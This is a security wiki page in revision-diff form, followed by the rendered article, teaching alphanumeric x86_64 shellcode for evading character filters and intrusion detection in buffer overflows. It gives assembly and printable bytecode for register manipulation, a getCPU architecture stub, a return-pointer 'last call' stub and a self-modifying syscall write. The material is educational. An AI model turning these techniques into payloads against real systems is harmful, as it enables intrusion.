Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Shellcode/Alphanumeric"

From NetSec
Jump to: navigation, search
(Example: Zeroing Out x86_64 CPU Registers)
 
(18 intermediate revisions by 2 users not shown)
Line 9: Line 9:
 
=Alphanumeric x86_64 register value and data manipulation=
 
=Alphanumeric x86_64 register value and data manipulation=
  
Given the limited set of instructions for alphanumeric shellcode, its important to note different methods to manipulate different registers within the confines of the limited instruction set. Identifying these leads to '''mov emulations''', which make up most of the actual code.
+
Given the limited set of instructions for alphanumeric shellcode, it is important to note different methods to manipulate different registers within the confines of the limited instruction set. Identifying these leads to '''mov emulations''', which make up most of the actual code.  
  
==Push==
+
Alphanumeric data can be [[Shellcode/Appendix/Alphanumeric_opcode#Push:_Alphanumeric_x86_64_data|pushed in one-byte, two-byte, and four-byte]] quantities at once. [[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 Extended Registers|Pushing the 64 bit registers RAX-RDI]] is done using a single upper case P-W (\x50-\x57) dependent on which register is being pushed. Prefixing with "A" (for [[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 General Registers|general registers R8-R15]]) or "f" for 16 bit registers ([[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 16 bit Registers|AX-DI]]) gives access to push 32 registers using alphanumeric shellcode. For [[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 16 bit General Registers|16 bit general registers R8B-R15b]] "f" is prefixed to the corresponding R8-R15 register push.
  
Alphanumeric data can be [[Shellcode/Appendix/Alphanumeric_opcode#Push:_Alphanumeric_x86_64_data|pushed in one-byte, two-byte, and four-byte]] quantities at once.
+
Pop is more limited in its range of usable registers due to the limitations of alphanumeric shellcode. [[Shellcode/Appendix/Alphanumeric_opcode#Pop: x86_64 Extended Registers|This is limited to RAX, RCX, and RAX.]]  As with push, the extended register shellcode is prefixed to access 16 bit and general registers.  This gives the ability to pop a total of 12 (6 full size and 6 16 bit) registers able to be pop(ed).  
 
+
[[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 Extended Registers|Pushing the 64 bit registers RAX-RDI]] is done using a single upper case P-W (\x50-\x57) dependent on which register is being pushed. Prefixing with "A" (for general registers R8-R15) or "f" for 16 bit registers (AX-DI) gives access to push 32 registers using alphanumeric shellcode.
+
 
+
For the [[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 General Registers|general registers R8-R15]] "A" is prefixed to the corresponding RAX-RDI register push.
+
For the [[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 16 bit Registers|16 bit registers AX-DI]] "f" is prefixed to the corresponding RAX-RDI register push.
+
For the [[Shellcode/Appendix/Alphanumeric_opcode#Push: x86_64 16 bit General Registers|16 bit general registers R8B-R15b]] "f" is prefixed to the corresponding R8-R15 register push.
+
 
+
==Pop==
+
 
+
Pop is more limited in its range of usable registers due to the limitations of alphanumeric shellcode.   [[Shellcode/Appendix/Alphanumeric_opcode#Pop: x86_64 Extended Registers|This is limited to RAX, RCX, and RAX.]]  As with push, the extended register shellcode is prefixed to access 16 bit and general registers.  This gives the ability to pop a total of 12 (6 full size and 6 16 bit) registers able to be pop(ed).  
+
  
 
For [[Shellcode/Appendix/Alphanumeric_opcode#Pop: x86_64 General Registers|general registers, RAX-RCX]] are prefixed with "A" for the corresponding R8-R10 pop. The [[Shellcode/Appendix/Alphanumeric_opcode#x86_64 16 bit registers|16 bit registers]] (using 0x66 or 'f' [sometimes fA] prefix):
 
For [[Shellcode/Appendix/Alphanumeric_opcode#Pop: x86_64 General Registers|general registers, RAX-RCX]] are prefixed with "A" for the corresponding R8-R10 pop. The [[Shellcode/Appendix/Alphanumeric_opcode#x86_64 16 bit registers|16 bit registers]] (using 0x66 or 'f' [sometimes fA] prefix):
Line 41: Line 31:
 
*%rax-%rdi
 
*%rax-%rdi
  
== Prefixes ==
+
There are 5 main registers and 5 special 64 bit registers that can be push(ed), but not pop(ed):
 
+
Examining this next section, there are 5 main registers, and 5 special 64 bit registers that can be push(ed), but not pop(ed):
+
  
 
*%rbx
 
*%rbx
Line 51: Line 39:
 
*%rdi
 
*%rdi
  
This can be written using alphanumeric bytecode instructions and operands only through the use of any of the 6 full control registers by emulating for mov with push and pop.  Using only the registers already accessed, an attempt will be made to get instructions for to set values.
+
This can be written using alphanumeric bytecode instructions and operands only through the use of any of the 6 full control registers by emulating for mov with push and pop.  Using only the registers already accessed, an attempt will be made to get instructions to set values.
  
 
The special register prefix has been identified:
 
The special register prefix has been identified:
Line 63: Line 51:
 
Note the identification of all the [[Shellcode/Appendix/Alphanumeric_opcode#Prefixes|alphanumeric overrides and prefixes]]. These overrides are very similar to those for 32 bit platforms.
 
Note the identification of all the [[Shellcode/Appendix/Alphanumeric_opcode#Prefixes|alphanumeric overrides and prefixes]]. These overrides are very similar to those for 32 bit platforms.
  
== Operands ==
+
Opcodes used for popping a register can also be used as 'register operands' for more advanced instructions.  For example, take [[Shellcode/Appendix/Alphanumeric_opcode#Xor_Pop_Operands|this xor instruction]]. The %rax register can be changed to %rcx or %rdx using the 0x59 ''Y'' and 0x5a ''Z'' opcodes in place of the 0x58 ''X'' [[Shellcode/Appendix/Alphanumeric_opcode#Xor_Move_To_%25ebx|opcode]].
 
+
Opcodes used for popping a register can also be used as 'register operands' for more advanced instructions.  For example, take [[Shellcode/Appendix/Alphanumeric_opcode#Xor_Pop_Operands|this xor instruction.]] The %rax register can be changed to %rcx or %rdx using the 0x59 (Y) and 0x5a (Z) opcodes in place of the 0x58 (X) [[Shellcode/Appendix/Alphanumeric_opcode#Xor_Move_To_%ebx|opcode]].
+
  
 
Whenever there's a controllable register, the notation {reg} is used to recognize it as an option.  In the bytecodes and string examples, a '?' is used in the bytecode itself and a '*' to denote the register operand, [[Shellcode/Appendix/Alphanumeric_opcode#Byte_Syntax_Example|for example]].
 
Whenever there's a controllable register, the notation {reg} is used to recognize it as an option.  In the bytecodes and string examples, a '?' is used in the bytecode itself and a '*' to denote the register operand, [[Shellcode/Appendix/Alphanumeric_opcode#Byte_Syntax_Example|for example]].
Line 71: Line 57:
 
The opcodes for '''%rax''', '''%rcx''', and '''%rdx''' are important and thus will be used frequently.  When encountering multiple operands, the operand number is used in the notation for readability purposes.
 
The opcodes for '''%rax''', '''%rcx''', and '''%rdx''' are important and thus will be used frequently.  When encountering multiple operands, the operand number is used in the notation for readability purposes.
  
== The rbx, rsp, and rbp registers ==
 
 
Identifying the ways to set the rest of the registers while investigating %rbx was not entirely fruitful.  Full control over the %rbx register is not available, however, write access to its sub-registers is available:
 
Identifying the ways to set the rest of the registers while investigating %rbx was not entirely fruitful.  Full control over the %rbx register is not available, however, write access to its sub-registers is available:
 
* %ebx
 
* %ebx
Line 83: Line 68:
 
*Movslq
 
*Movslq
  
 
+
To access the %ss segment, insert the prefix at the beginning of the bytecode of instructions (e.g. "63*?" instead of "3*?").  If use of the special 64 bit registers is preferred, 0x41 or "A" is placed at the beginning of the bytecode.  If the use of both is required, the %ss segment register prefix first, e.g. '6A3*?' must always be used.  When using one of the 64 bit force operators, one can use any of those instructions on a 32 bit register with an override to treat it as its 64-bit counterpart (in this case, 0x48).
To access the %ss segment, insert the prefix at the beginning of the bytecode of instructions (e.g. "63*?" instead of "3*?").  If preferred to use the special 64 bit registers,  
+
0x41 or "A" is placed at the beginning of the bytecode.  If the use of both is required, the %ss segment register prefix first, e.g. '6A3*?' must always be used.  When using one of the 64 bit force operators, one can use any of those instructions on a 32 bit register with an override to treat it as its 64-bit counterpart (in this case, 0x48).
+
  
 
{| class="wikitable"
 
{| class="wikitable"
Line 97: Line 80:
 
|}
 
|}
  
To set the value of %rbx  directly, imul, xor, and movslq can be used.  It's similar for other registers:
+
To set the value of %rbx  directly, imul, xor, and movslq can be used.  It is similar for other registers:
 
* %rbp
 
* %rbp
 
* %rsp
 
* %rsp
  
==Xor==
+
Left over are %rsp, %rbp, %rdi, and %rsi.  Taking a closer look at xor, at [[Shellcode/Appendix/Alphanumeric_opcode#xors|0x30 and ending at 0x35]] are these valuable xor commands:
Left over are %rsp, %rbp, %rdi, and %rsi.  Taking a closer look at xor, at [[Shellcode/Appendix/Alphanumeric_opcode#xors|0x30 and ending at 0x35]] are these valuable xor commands.
+
 
+
'''[[Shellcode/Appendix/Alphanumeric_opcode#0x30|0x30]]''' is a multi-byte xor instruction.  Requiring at least two operands (even if register denote):
+
  
'''[[Shellcode/Appendix/Alphanumeric_opcode#0x31|0x31]]''' is as flexible as '''0x30'''. Not all permutations are included for brevity.
+
* '''[[Shellcode/Appendix/Alphanumeric_opcode#0x30|0x30]]''' is a multi-byte xor instruction. Requiring at least two operands (even if one of them denotes a register).
  
'''[[Shellcode/Appendix/Alphanumeric_opcode#0x32|0x32]]''' is just as flexible, although the offsets will change source side rather than destination side. Not all permutations are included for brevity.
+
* '''[[Shellcode/Appendix/Alphanumeric_opcode#0x31|0x31]]''' is as flexible as '''0x30'''.
  
'''[[Shellcode/Appendix/Alphanumeric_opcode#0x33|0x33]]''' is the opposite of 0x31 and as flexible. Not all permutations are included for brevity.
+
* '''[[Shellcode/Appendix/Alphanumeric_opcode#0x32|0x32]]''' is just as flexible, although the offsets will change source side rather than destination side.
  
== The rsi and rdi registers ==
+
* '''[[Shellcode/Appendix/Alphanumeric_opcode#0x33|0x33]]''' is the opposite of 0x31 and as flexible.
  
Combining the knowledge of xor with the knowledge of the stack.  When any data is pushed, the data is accessible at %ss:(%rsp).  Knowing this, another register can be used in the available space (e.g. %rcx) to set values on some of the more difficult registers:
+
Combining the knowledge of xor with the knowledge of the stack, when any data is pushed, the data is accessible at %ss:(%rsp).  Knowing this, another register can be used in the available space (e.g. %rcx) to set values on some of the more difficult registers:
  
 
*%rbx
 
*%rbx
Line 189: Line 169:
  
 
This can come in quite handy when chunking large pieces of data to 0.
 
This can come in quite handy when chunking large pieces of data to 0.
 +
 +
= Environment =
 +
== GetCPU ==
 +
 +
Architecture can only be determined when compatible channels between the target [[instruction set architecture]]s can be isolated.  As long as the [[assembly#instructions|instructions]] perform valid behavior and do not cause [[segmentation fault|access faults]] on [[operating system]]s native to the architecture, it is possible to use a single bytecode sequence in order to determine architecture across a variety of processors.  It generally takes a great amount of familiarity and experience with two or more given instruction sets to write [[shellcode]] for multiple architectures.
 +
 +
The x86_64 [[instruction set architecture]] (also known as ''x64'') does not vastly differ from x86 because of '''AMD''''s  correcting of Intel's calling convention and architecture. 
 +
 +
An [[Shellcode/Appendix/Alphanumeric_opcode#x86_Intercompatibility|alphanumeric instruction compatibility chart]] can be derived by cross referencing [[Shellcode/Appendix/Alphanumeric_opcode#64-bit_alphanumeric_opcodes|available alphanumeric 64 bit instructions]] with [[Shellcode/Appendix/Alphanumeric_opcode#32-bit_printable_opcodes|available printable 32 bit instructions]].
 +
 +
=== Inter-compatibility theory ===
 +
Specifically non-compatible are the 32 and 64 bit opcodes in the range '''0x40-0x4f''', as they allow a 32 bit processor to increment or decrement its general-purpose registers, but become prefixes for manipulation of 64 bit registers and 8 additional 64 bit general purpose registers in x64 environments, '''%r8-%r15'''. 
 +
 +
Since not ''all'' opcodes are intercompatible, yet comparisons and conditional jumps ''are'' intercompatible, it is possible to determine the architecture of an x86 processor using exclusively alphanumeric opcodes.
 +
 +
By making use of these additional registers (which 32 bit processors do not have), one can perform an operation that will set a value on a different register in the two processors. Following this, a conditional statement can be made against one of the two registers to determine if the value was set. 
 +
 +
Using the '''pop''' instruction is the most effective way to set the value of a register due to instructional limitations (to keep the code alphanumeric).  Using an alternative register to %rsp or %esp as a placeholder for the stack pointer enables the use of an effective conditional statement to determine if the value of a register is equal to the most recent thing pushed or popped from the stack.
 +
 +
=== Practically Applied: Code ===
 +
This simple alphanumeric bytecode is 15 bytes long, ending in a comparison which returns '''equal''' on a 32 bit system and '''not equal''' on a 64 bit system. 
 +
 +
When implementing this bytecode, a conditional jump afterwards may be best reserved for the '''t''' and '''u''' instructions, '''jump if equal''' and '''jump if not equal''', respectively.
 +
 +
* Assembled:
 +
:'''TX4HPZTAZAYVH92'''
 +
 +
* Disassembly:
 +
The table here shows opcodes on the left when instructions are equivocal, and opcodes on the right when they differentiate per [[instruction set architecture|instruction set]].
 +
{| class="wikitable"
 +
|-
 +
! OpCodes
 +
! x86
 +
! x64
 +
|-
 +
| '''54'''
 +
| <source lang="asm">push %esp</source>
 +
| <source lang="asm">push %rsp</source>
 +
|-
 +
| '''58'''
 +
| <source lang="asm">pop %eax</source>
 +
| <source lang="asm">pop %rax</source>
 +
|-
 +
| '''34 48'''
 +
| <source lang="asm">xor $0x48, %al</source>
 +
| <source lang="asm">xor $0x48, %al</source>
 +
|-
 +
| '''50'''
 +
| <source lang="asm">push %eax</source>
 +
| <source lang="asm">push %rax</source>
 +
|-
 +
| '''5a'''
 +
| <source lang="asm">pop %edx</source>
 +
| <source lang="asm">pop %rdx</source>
 +
|-
 +
| '''54'''
 +
| <source lang="asm">push %esp</source>
 +
| <source lang="asm">push %rsp</source>
 +
|-
 +
| <div align="right"><font size="-1">'''''41''''' <br />
 +
'''''5a'''''</font></div>
 +
|<source lang="asm">inc %ecx
 +
pop %edx</source>
 +
|<source lang="asm">pop %r10</source>
 +
|-
 +
| <div align="right"><font size="-1">'''''41'''''<br />
 +
'''''59'''''</font></div>
 +
|<source lang="asm">inc %ecx
 +
pop %ecx</source>
 +
|<source lang="asm">pop %r9</source>
 +
|-
 +
| '''56'''
 +
|<source lang="asm">push %esi</source>
 +
|<source lang="asm">push %rsi</source>
 +
|-
 +
| <div align="right"><font size="-1">'''''48'''''<br />
 +
'''''39 32'''''</font></div>
 +
|<source lang="asm">dec %eax
 +
cmp %esi,(%edx)</source>
 +
|<source lang="asm">cmp %rsi,(%rdx)</source>
 +
|}
 +
 +
This code executes similarly, but not identically, on both a 32-bit and 64-bit system. The key discrepancy between how the two architectures execute this code is centered around the opcodes "0x41 - 0x4f".
 +
 +
Under a 32-bit architecture, this code pops the value of esp (which was pushed onto the stack previously) into edx and increments ecx. Since the esp register is a pointer to the top of the stack, rdx now contains a pointer to the top of the stack. After this is done, the shellcode continues on to push esi onto the stack - so the value of esi now resides at the top of the stack. When the code executes its final comparison - "cmp %esi, (%edx)" - it is comparing the value of esi to the value that edx points to. As edx points to the top of the stack, and because esi has just been pushed to the top of the stack, the resulting comparison is between the value  esi and the value esi. Therefore, ''equal'' is returned.
 +
 +
Under a 64-bit architecture this shellcode is ''not equal'' . The opcodes "41 5a 41 59" have a different function - instead of popping the value of esp into rdx, it pops it into the 64-bit register %r10 without incrementing %ecx or %rcx, as 0x41 is used as a prefix to indicate the access to the 64-bit architecture. As a result, when the final comparison is made between rsi and the value referenced by rdx, it returns not equal, as rdx does not point to the top of the stack.
 +
 +
On a 64-bit system, this will not cause a [[segmentation fault|segfault]] because (%rdx) points to somewhere inside the stack.
 +
 +
== Last call ==
 +
{{code|text=<center>Assembled ''x64''<br />'''XTX4E4UH10H30'''</center>}}
 +
 +
The steps taken in order to obtain the address to the beginning of the [[shellcode]] in only [[Alphanumeric_shellcode|alphanumeric]] code are a little more complex.
 +
 +
First, to prevent destroying the return pointer (the target data), at least 8 must be added to the stack pointer. This can be done with the use of any conventional ''pop'' operation, in this case, ''pop %rax'', which then moves ''%rsp'' into ''%rax'' through a ''[[push]]'' / ''[[pop]]'' mov emulation.
 +
 +
{{code|text=<source lang="asm">
 +
  pop %rax
 +
  push %rsp                # move pointer to %rsp into %rax
 +
  pop %rax
 +
</source>}}
 +
 +
 +
Because the ''pop'' has added 0x8 to ''%rsp'', 0x10 must be substracted from ''%rax'' in order to access the return pointer, this is emulated by [[Bitwise_math#XOR|XOR]]ing ''%al'' with 0x45 and then 0x55:
 +
 +
 +
{{code|text=<source lang="asm">
 +
  xor $0x45,%al            # subtract 0x10 from %rax
 +
  xor $0x55,%al
 +
</source>}}
 +
 +
This effectively runs a ''[[not]]'' operation against a single bit.  Because of this, the operation is actually + or -, and is not always guaranteed to work its first execution; the problem of which is very easily mitigated through repeated execution (and may not work at times with aslr disabled).
 +
 +
The most recently returned-from [[return address]] is then moved into ''%rsi'' through the use of an ''[[xor]]'' mov emulation:
 +
{{code|text=<source lang="asm">
 +
  xor %rsi,(%rax)
 +
  xor (%rax),%rsi          # move address to last instruction into %rsi
 +
</source>}}
  
 
=Example: Zeroing Out x86_64 CPU Registers=
 
=Example: Zeroing Out x86_64 CPU Registers=
Line 304: Line 403:
 
To reproduce this, because the syscall is binary, it must be written to a location that will eventually be executed ahead of currently executing code.  The '''xor''' and '''imul''' instructions can then be used to set values on registers.
 
To reproduce this, because the syscall is binary, it must be written to a location that will eventually be executed ahead of currently executing code.  The '''xor''' and '''imul''' instructions can then be used to set values on registers.
  
==The Offset==
+
== Writing the syscall ==
 +
The very first part of the code is used to determine location and write a syscall to the end. 
  
 
{{code|text=<source lang="asm">
 
{{code|text=<source lang="asm">
.text
 
.global _start
 
_start:
 
 
   pop %rax
 
   pop %rax
   push %rsp                 # move pointer to %rsp into %rax
+
   push %rsp
 
   pop %rax
 
   pop %rax
   xor $0x65, %al           # subtract 0x10 from %rax
+
   xor $0x65,%al
   xor $0x75, %al
+
   xor $0x75,%al
   movslq 0x34(%rax), %rsi   # zero out %rsi
+
   xor %rsi, (%rax)  # mov emulated into rsi
  xor 0x34(%rax), %rsi
+
   xor (%rax), %rsi
  movslq 0x34(%rax), %rdi   # zero out %rsi
+
   push %rsi
  xor 0x34(%rax), %rdi
+
   xor (%rax), %rsi         # move address to last instruction into %rax
+
   push %rsi  
+
 
   pop %rcx
 
   pop %rcx
 
+
  pushq $0x3030474a
   push %rcx
+
   pop %rax
  push [len]
+
   xor %eax,0x64(%rcx)
   xor (%rax), %rdi
+
 
+
  ; (%rcx, %rdi, 1) = addr of first nops
+
 
+
 
</source>}}
 
</source>}}
  
==The Syscall==
 
* Now that the offset to an address in front of executing instructions has been obtained, 4 bytes must be nulled for the new instructions to be written:
 
{{code|text=<source lang="asm">
 
        movslq (%rcx,%rdi,1), %rsi
 
        xor %esi, (%rcx,%rdi,1)
 
</source>}}
 
  
 
* This next xor comes out to 0x0000050f, which when moved onto the stack becomes 0x0f050000.  0x0f05 is the machine code for a '''syscall'''.
 
* This next xor comes out to 0x0000050f, which when moved onto the stack becomes 0x0f050000.  0x0f05 is the machine code for a '''syscall'''.
{{code|text=<source lang="asm">
+
0x3030474a xor 30304245 -- the "EB00" at the end of the shellcode:
        push $0x3030474a
+
{{code|text=<source lang="asm"> rex.RB
        pop %rax
+
  rex.X xor %sil,(%rax)</source>}}
        xor $0x30304245, %eax
+
</source>}}
+
  
* The %rax register now contains 0x050f.  Put 0x0f050000 at (%rcx) - then set the stack pointer back.
+
* The 'EB' in 'EB00' at the end of the shellcode has become 0x050f.
{{code|text=<source lang="asm">
+
        push %rax
+
        pop %rax                        # Garbage reg
+
</source>}}
+
 
+
* A '''mov emulation''' is used to mov 0x0f05 from (%rcx) to %rcx + %rdi through the %rsi register, writing the syscall instructions:
+
{{code|text=<source lang="asm">
+
        movslq (%rcx), %rsi
+
        xor %esi, (%rcx,%rdi,1)
+
</source>}}
+
  
 
==Arguments==
 
==Arguments==
Line 440: Line 512:
 
   # exit
 
   # exit
 
   root ~ #
 
   root ~ #
 +
 +
[[Category:Shellcode]]
 +
{{Social}}

Latest revision as of 02:31, 25 April 2013

Alphanumeric shellcode is similar to ascii shellcode in that it is used to bypass character filters and evade intrusion-detection during buffer overflow exploitation. Alphanumeric shellcode can be used to determine a number of factors about the target environment, including the return pointer via a last call technique or the instruction set architecture using a getCPU stub. Available alphanumeric opcodes for the 64-bit x86 architecture limit the use of modifiers to pop, movslq, xor, and imul.


c3el4.png
While it is possible to write x86 intercompatible alphanumeric shellcode, this article primarily documents alphanumeric code for the 64 bit x86 architecture.
Shellcode/Alphanumeric requires a basic understanding of bitwise math, assembly and shellcode.


Special thanks to hatter for his contributions to this article.

Alphanumeric x86_64 register value and data manipulation

Given the limited set of instructions for alphanumeric shellcode, it is important to note different methods to manipulate different registers within the confines of the limited instruction set. Identifying these leads to mov emulations, which make up most of the actual code.

Alphanumeric data can be pushed in one-byte, two-byte, and four-byte quantities at once. Pushing the 64 bit registers RAX-RDI is done using a single upper case P-W (\x50-\x57) dependent on which register is being pushed. Prefixing with "A" (for general registers R8-R15) or "f" for 16 bit registers (AX-DI) gives access to push 32 registers using alphanumeric shellcode. For 16 bit general registers R8B-R15b "f" is prefixed to the corresponding R8-R15 register push.

Pop is more limited in its range of usable registers due to the limitations of alphanumeric shellcode. This is limited to RAX, RCX, and RAX. As with push, the extended register shellcode is prefixed to access 16 bit and general registers. This gives the ability to pop a total of 12 (6 full size and 6 16 bit) registers able to be pop(ed).

For general registers, RAX-RCX are prefixed with "A" for the corresponding R8-R10 pop. The 16 bit registers (using 0x66 or 'f' [sometimes fA] prefix):

Using push and pop the values of 6 fullsize CPU registers can be set:

  • %rax
  • %rcx
  • %rdx
  • %r8
  • %r9
  • %r8

Or get any values of 16 fullsize CPU registers to the top of the stack:

  • %r8-%r15
  • %rax-%rdi

There are 5 main registers and 5 special 64 bit registers that can be push(ed), but not pop(ed):

  • %rbx
  • %rsp
  • %rbp
  • %rsi
  • %rdi

This can be written using alphanumeric bytecode instructions and operands only through the use of any of the 6 full control registers by emulating for mov with push and pop. Using only the registers already accessed, an attempt will be made to get instructions to set values.

The special register prefix has been identified:

 0x41, 'A'

The word operand override has been identified,

 0x66, 'f'.

Note the identification of all the alphanumeric overrides and prefixes. These overrides are very similar to those for 32 bit platforms.

Opcodes used for popping a register can also be used as 'register operands' for more advanced instructions. For example, take this xor instruction. The %rax register can be changed to %rcx or %rdx using the 0x59 Y and 0x5a Z opcodes in place of the 0x58 X opcode.

Whenever there's a controllable register, the notation {reg} is used to recognize it as an option. In the bytecodes and string examples, a '?' is used in the bytecode itself and a '*' to denote the register operand, for example.

The opcodes for %rax, %rcx, and %rdx are important and thus will be used frequently. When encountering multiple operands, the operand number is used in the notation for readability purposes.

Identifying the ways to set the rest of the registers while investigating %rbx was not entirely fruitful. Full control over the %rbx register is not available, however, write access to its sub-registers is available:

  •  %ebx
  •  %bx
  •  %bh
  •  %bl

Upon further investigation, this opened up access to multiple additional registers using:

  • Xor
  • Imul
  • Movslq

To access the %ss segment, insert the prefix at the beginning of the bytecode of instructions (e.g. "63*?" instead of "3*?"). If use of the special 64 bit registers is preferred, 0x41 or "A" is placed at the beginning of the bytecode. If the use of both is required, the %ss segment register prefix first, e.g. '6A3*?' must always be used. When using one of the 64 bit force operators, one can use any of those instructions on a 32 bit register with an override to treat it as its 64-bit counterpart (in this case, 0x48).

Assembly Hexadecimal Alpha
imul   $0x[byte1],0x[byte2]({reg64}),{reg64}
\x48\x6b\x??\x#2\x#1 Hk*21

To set the value of %rbx directly, imul, xor, and movslq can be used. It is similar for other registers:

  •  %rbp
  •  %rsp

Left over are %rsp, %rbp, %rdi, and %rsi. Taking a closer look at xor, at 0x30 and ending at 0x35 are these valuable xor commands:

  • 0x30 is a multi-byte xor instruction. Requiring at least two operands (even if one of them denotes a register).
  • 0x31 is as flexible as 0x30.
  • 0x32 is just as flexible, although the offsets will change source side rather than destination side.
  • 0x33 is the opposite of 0x31 and as flexible.

Combining the knowledge of xor with the knowledge of the stack, when any data is pushed, the data is accessible at %ss:(%rsp). Knowing this, another register can be used in the available space (e.g. %rcx) to set values on some of the more difficult registers:

  • %rbx
  • %rsp
  • %rbp
  • %rsi
  • %rdi

First, utilise push and pop to simulate 'mov':

<syntaxhighlight lang="asm"> push %rsp; \x54 pop  %rcx; \x59 pop  %rax; \x5a (This just sets the pointer back) </syntaxhighlight>

Two XOR parameters allow index registers to be set, %rsi and %rdi. For now, they will be zero'd out:

<syntaxhighlight lang="asm"> push %rsi; \x56 xor %ss:(%rcx), %rsi; \x36\x48\x33\x31 pop %r8; \x41\x58 push %rdi; \x57 xor %ss:(%rcx), %rdi; \x36\x48\x33\x39 pop %r8 </syntaxhighlight>

Now %rsi and %rdi have been zero'd out. %r14 and %r15 special registers can also be pushed and zeroed out in this fashion. Now "full control" is gained over:

  • %rax
  • %rcx
  • %rdx
  • %rsi
  • %rdi
  • %r8
  • %r9
  • %r10
  • %r14
  • %r15

So far, in this sample, full control has not been utilized over:

  • %rsp
  • %rbp
  • %rbx
  • %r11
  • %r12
  • %r13

Similar to push, controllable data is required before the setting of a register. Where pop is concerned, something might be required to be pushed to the stack first, in this case, only the zero register is required. Due to the way that XOR works, once a zero is registered at all, in this case %rax is used as the zero register, it can be used to get %rbx, %rsp, and %rbp to zero if needed:

To get %rbx:

<syntaxhighlight lang="asm"> xor %ss:0x30(%rcx), %rax; store that value in rax xor %rax, %ss:0x30(%rcx); Null that area of stack imul $0x30,%ss:0x30(%rax),%rbx; 0x30 * 0 = 0 imul $0x30,%ss:0x30(%rax),%rbp; 0x30 * 0 = 0 </syntaxhighlight>

Once the stack space, as well as the destination is set to zero, %rax, %rbp can effectively be mov(ed):

<syntaxhighlight lang="asm"> xor  %rax,%ss:0x30(%rcx); 36 48 31 41 30 xor  %ss:0x30(%rcx),%rbp; 36 48 33 69 30 </syntaxhighlight>

The closest thing to incrementing and decrementing is the ability to use the ins and outs instructions to add or subtract 1,2, or 4 against the %rdi register. This still leaves no significant add or sub. Imul can be used with 16 and 8 bit registers to find division. If %rsi or %rdi are not in use, there is also a magic mov :

<syntaxhighlight lang="asm"> movslq %ss:0x30(%rcx), %rsi xor %rsi, %ss:0x30(%rsi) </syntaxhighlight>

This can come in quite handy when chunking large pieces of data to 0.

Environment

GetCPU

Architecture can only be determined when compatible channels between the target instruction set architectures can be isolated. As long as the instructions perform valid behavior and do not cause access faults on operating systems native to the architecture, it is possible to use a single bytecode sequence in order to determine architecture across a variety of processors. It generally takes a great amount of familiarity and experience with two or more given instruction sets to write shellcode for multiple architectures.

The x86_64 instruction set architecture (also known as x64) does not vastly differ from x86 because of AMD's correcting of Intel's calling convention and architecture.

An alphanumeric instruction compatibility chart can be derived by cross referencing available alphanumeric 64 bit instructions with available printable 32 bit instructions.

Inter-compatibility theory

Specifically non-compatible are the 32 and 64 bit opcodes in the range 0x40-0x4f, as they allow a 32 bit processor to increment or decrement its general-purpose registers, but become prefixes for manipulation of 64 bit registers and 8 additional 64 bit general purpose registers in x64 environments, %r8-%r15.

Since not all opcodes are intercompatible, yet comparisons and conditional jumps are intercompatible, it is possible to determine the architecture of an x86 processor using exclusively alphanumeric opcodes.

By making use of these additional registers (which 32 bit processors do not have), one can perform an operation that will set a value on a different register in the two processors. Following this, a conditional statement can be made against one of the two registers to determine if the value was set.

Using the pop instruction is the most effective way to set the value of a register due to instructional limitations (to keep the code alphanumeric). Using an alternative register to %rsp or %esp as a placeholder for the stack pointer enables the use of an effective conditional statement to determine if the value of a register is equal to the most recent thing pushed or popped from the stack.

Practically Applied: Code

This simple alphanumeric bytecode is 15 bytes long, ending in a comparison which returns equal on a 32 bit system and not equal on a 64 bit system.

When implementing this bytecode, a conditional jump afterwards may be best reserved for the t and u instructions, jump if equal and jump if not equal, respectively.

  • Assembled:
TX4HPZTAZAYVH92
  • Disassembly:

The table here shows opcodes on the left when instructions are equivocal, and opcodes on the right when they differentiate per instruction set.

OpCodes x86 x64
54
push %esp
push %rsp
58
pop %eax
pop %rax
34 48
xor $0x48, %al
xor $0x48, %al
50
push %eax
push %rax
5a
pop %edx
pop %rdx
54
push %esp
push %rsp
41
5a
inc %ecx
pop %edx
pop %r10
41
59
inc %ecx
pop %ecx
pop %r9
56
push %esi
push %rsi
48
39 32
dec %eax
cmp %esi,(%edx)
cmp %rsi,(%rdx)

This code executes similarly, but not identically, on both a 32-bit and 64-bit system. The key discrepancy between how the two architectures execute this code is centered around the opcodes "0x41 - 0x4f".

Under a 32-bit architecture, this code pops the value of esp (which was pushed onto the stack previously) into edx and increments ecx. Since the esp register is a pointer to the top of the stack, rdx now contains a pointer to the top of the stack. After this is done, the shellcode continues on to push esi onto the stack - so the value of esi now resides at the top of the stack. When the code executes its final comparison - "cmp %esi, (%edx)" - it is comparing the value of esi to the value that edx points to. As edx points to the top of the stack, and because esi has just been pushed to the top of the stack, the resulting comparison is between the value esi and the value esi. Therefore, equal is returned.

Under a 64-bit architecture this shellcode is not equal . The opcodes "41 5a 41 59" have a different function - instead of popping the value of esp into rdx, it pops it into the 64-bit register %r10 without incrementing %ecx or %rcx, as 0x41 is used as a prefix to indicate the access to the 64-bit architecture. As a result, when the final comparison is made between rsi and the value referenced by rdx, it returns not equal, as rdx does not point to the top of the stack.

On a 64-bit system, this will not cause a segfault because (%rdx) points to somewhere inside the stack.

Last call

Assembled x64
XTX4E4UH10H30

The steps taken in order to obtain the address to the beginning of the shellcode in only alphanumeric code are a little more complex.

First, to prevent destroying the return pointer (the target data), at least 8 must be added to the stack pointer. This can be done with the use of any conventional pop operation, in this case, pop %rax, which then moves %rsp into %rax through a push / pop mov emulation.

 
  pop %rax
  push %rsp                 # move pointer to %rsp into %rax
  pop %rax
 


Because the pop has added 0x8 to %rsp, 0x10 must be substracted from %rax in order to access the return pointer, this is emulated by XORing %al with 0x45 and then 0x55:


 
  xor $0x45,%al            # subtract 0x10 from %rax
  xor $0x55,%al
 

This effectively runs a not operation against a single bit. Because of this, the operation is actually + or -, and is not always guaranteed to work its first execution; the problem of which is very easily mitigated through repeated execution (and may not work at times with aslr disabled).

The most recently returned-from return address is then moved into %rsi through the use of an xor mov emulation:

 
  xor %rsi,(%rax)
  xor (%rax),%rsi          # move address to last instruction into %rsi
 

Example: Zeroing Out x86_64 CPU Registers

First %rsp is pushed to the top of the stack and the pointer address is popped into in %rcx, the third pop is to ensure that the pointer address matches what is now in %rcx.

<syntaxhighlight lang="asm">

       push %rsp
       pop %rcx
